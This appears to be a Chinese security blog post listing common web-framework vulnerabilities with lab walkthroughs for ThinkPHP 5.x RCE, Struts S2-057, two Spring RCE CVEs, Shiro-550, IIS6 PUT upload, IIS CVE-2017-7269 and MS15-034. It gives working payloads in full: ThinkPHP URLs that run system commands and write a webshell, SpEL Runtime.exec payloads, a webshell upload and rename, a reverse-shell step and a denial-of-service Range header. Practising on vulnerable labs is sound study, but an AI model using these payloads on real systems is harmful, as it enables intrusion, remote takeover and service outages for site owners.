常见框架漏洞

一、Thinkphp5x远程命令执行及getshell

1.进入环境页面

2.在地址栏后输入

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

执行远程代码执行

3.也可以执行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

在网页查看phpinfo

4.进行getshell

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20"<?php%20phpinfo();?>"%20>>文件名

然后访问我们的文件

二、S2-057远程执行代码漏洞

1.搭建环境在地址栏后输入/struts2/showcase进入页面

2.在url处输入${(123+123)}/actionChain1.action后刷新可以看到中间数字位置相加了

3.将上面验证的payload值修改为我们的利用exp

三、Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

1.搭建环境进入customers/1

2.打开burp抓包,将GET修改为PATCH,添加字段 Content-Type: application/json-patch+json,再将制作好的payload添加到最后一行

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

3.进⼊docker容器内查看是否执⾏命令

四、spring 代码执⾏ (CVE-2018-1273)

1.搭建环境后输入/users

2.输入账号密码进行抓包

3.在最后一行添加字段,把原来username那条字段删除

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/xxx")]=&password=&repeatedPassword=

4.进⼊docker容器内查看是否执⾏命令

五、Shiro rememberMe反序列化漏洞(Shiro-550)

1.搭建环境进入登录页面

2.打开工具进行爆破

3.可以输入系统命令

六、IIS6 PUT漏洞

1.开启 WebDAV 和写权限

2.把来宾账户修改权限为完全控制

3.打开抓包上传一句话木马

4.可以看到我们的木马文件上传成功了

5.使⽤MOVE命令将其更名为脚本⽂档后缀

6.打开软件测试连接成功

六、IIS RCE-CVE-2017-7269

1.kali先开启一个监听端口

2.反弹shell

python2 iis6 shell文件+iis服务器IP+端口号+kaliIP+端口号

3.可以看到监听成功

七、HTTP.SYS远程代码执⾏(MS15-034)

1.编辑请求头,增加Range: bytes=0-18446744073709551615字段返回 416 存在此漏洞

2.可以造成⼀个ddos的效果

POC: https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

3.这时候就可以看到虚拟机已经变卡了,甚⾄蓝屏

  • 11
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值